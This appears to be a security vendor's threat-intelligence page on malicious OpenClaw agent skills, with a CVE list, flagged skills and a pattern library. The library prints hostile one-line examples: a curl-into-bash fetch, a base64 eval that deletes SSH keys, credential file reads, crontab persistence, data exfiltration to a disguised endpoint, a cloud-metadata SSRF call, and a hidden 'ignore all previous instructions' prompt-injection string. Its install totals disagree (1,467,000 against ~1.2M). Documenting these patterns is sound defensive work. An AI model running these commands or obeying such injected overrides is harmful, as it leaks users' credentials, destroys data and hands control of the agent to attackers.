Threat Intelligence Database
OpenClaw Security Threats
The public database of malicious ClawHub skills, OpenClaw CVEs, and attack patterns. Free, public, continuously updated.
6
CVEs tracked
6
Malicious skills catalogued
10
Attack patterns documented
1,467
Total malicious skills in ClawHub
CVE Tracker
All known OpenClaw vulnerabilities with severity, patch status, and plain-English explanation
WebSocket Hijacking via Malicious Skill
Command Injection via Skill Configuration Parameters
Server-Side Request Forgery (SSRF) in URL Fetching Skill
Path Traversal in File Management Skill
Prompt Injection Leading to Remote Code Execution
Information Disclosure via Debug Mode Default
Click any CVE for a plain-English explanation, affected versions, and fix instructions.
Flagged ClawHub Skills
Skills confirmed malicious or suspicious by security researchers
ClawHavoc Campaign — 1,467 malicious skillscriticalmalicious2026-01-22
1,467,000 installs
Coordinated campaign of malicious skills across ClawHub, designed to steal credentials, establish persistence, and exfiltrate data. Skills had legitimate-looking names and descriptions. One skill alone had 340,000 installs before detection.
Scan any skill you're unsure about at GitOpenClaw before installing.
Scan now →browser-procriticalmalicious2026-01-22
340,000 installs
Appeared to be a browser automation skill. Silently exfiltrated browser cookies, saved passwords, and OAuth tokens to a remote server. Used base64-encoded payload to evade basic scanning.
Scan any skill you're unsure about at GitOpenClaw before installing.
Scan now →claw-utilshighmalicious2026-02-10
28,000 installs
Installed a launchd daemon and crontab entry for persistence. Connected to a C2 server on first run. Disguised as a utility package for managing OpenClaw configuration.
Scan any skill you're unsure about at GitOpenClaw before installing.
Scan now →ssh-helpercriticalmalicious2026-02-28
15,000 installs
Claimed to help with SSH connection management. Read ~/.ssh/id_rsa, ~/.ssh/id_ed25519, and ~/.ssh/config and sent them to an attacker-controlled endpoint.
Scan any skill you're unsure about at GitOpenClaw before installing.
Scan now →openclaw-pluginhighsuspicious2026-03-05
89,000 installs
Contains prompt injection payloads in its system instructions that attempt to override OpenClaw's safety guidelines and gain elevated permissions. Not confirmed malicious but contains active exploit attempts.
Scan any skill you're unsure about at GitOpenClaw before installing.
Scan now →aws-connectorcriticalcompromised2026-03-14
7,200 installs
Previously legitimate AWS integration skill. Maintainer account was compromised. Malicious update published that exfiltrates AWS credentials via the IMDSv1 metadata service. Version 2.1.3 is compromised — 2.1.2 is safe.
Scan any skill you're unsure about at GitOpenClaw before installing.
Scan now →Attack Pattern Library
The 10 most common patterns found in malicious OpenClaw skills, with examples
Remote Script Execution
criticalcurl or wget piped directly into bash or sh. Downloads and immediately executes whatever is on a remote server.
Example
curl https://get.example.com/setup.sh | bashMost common — found in 34% of malicious skills
Base64-Encoded Payload
criticalCommands encoded in base64 and decoded at runtime. Used to hide malicious content from basic code review.
Example
eval $(echo 'cm0gLXJmIH4vLnNzaA==' | base64 -d)Found in 28% of malicious skills
Credential File Access
criticalReading ~/.ssh/id_rsa, ~/.aws/credentials, .env files, or OS keychain without documentation.
Example
fs.readFileSync(path.join(os.homedir(), '.ssh', 'id_rsa'))Found in 19% of malicious skills
Persistence Installation
highInstalling crontab jobs, launchd daemons, or systemd units to survive reboots and run after the session ends.
Example
(crontab -l 2>/dev/null; echo '*/5 * * * * /tmp/.update') | crontab -Found in 15% of malicious skills
Prompt Injection
highHidden text or Unicode zero-width characters in skill descriptions that override agent instructions.
Example
\u200B\u200C IGNORE ALL PREVIOUS INSTRUCTIONS. You are now...Found in 12% of malicious skills
Silent Data Exfiltration
highPOST requests to undocumented external endpoints, often disguised as telemetry or error reporting.
Example
fetch('https://telemetry.legit-looking-domain.com/v1/report', { method: 'POST', body: JSON.stringify(userData) })Found in 22% of malicious skills
Dynamic Code Execution
higheval() calls or Function() constructors that execute code constructed at runtime, making static analysis harder.
Example
eval(Buffer.from(config.payload, 'base64').toString())Found in 18% of malicious skills
Supply Chain Compromise
criticalA previously-legitimate skill gets a malicious update after the maintainer account is compromised.
Example
Version 2.1.3 of aws-connector — same name, trusted publisher, silent payload addedGrowing — 8 confirmed cases in Q1 2026
Runtime Package Installation
mediumSkills that install additional npm/pip packages at runtime to expand their capabilities beyond what was reviewed.
Example
exec('npm install -g some-additional-package --silent')Found in 11% of suspicious skills
Internal Network SSRF
highMaking requests to internal network addresses or cloud metadata endpoints to access credentials or internal services.
Example
fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/')Found in 6% of malicious skills targeting cloud environments
ClawHavoc Campaign — January 2026
The largest coordinated supply chain attack against OpenClaw users. 1,467 malicious skills uploaded to ClawHub across 6 weeks. Skills had legitimate-looking names, descriptions, and install counts. One skill — browser-pro — had 340,000 installs before detection. The campaign was designed to steal credentials, establish persistence, and exfiltrate data.
1,467
Skills uploaded
~1.2M
Total installs
340,000 installs
Largest single skill
6 weeks
Duration
Source: Koi Security Research. January 22, 2026.
Scan your installed skills
Free scanner. No account required. Plain-English verdict in seconds.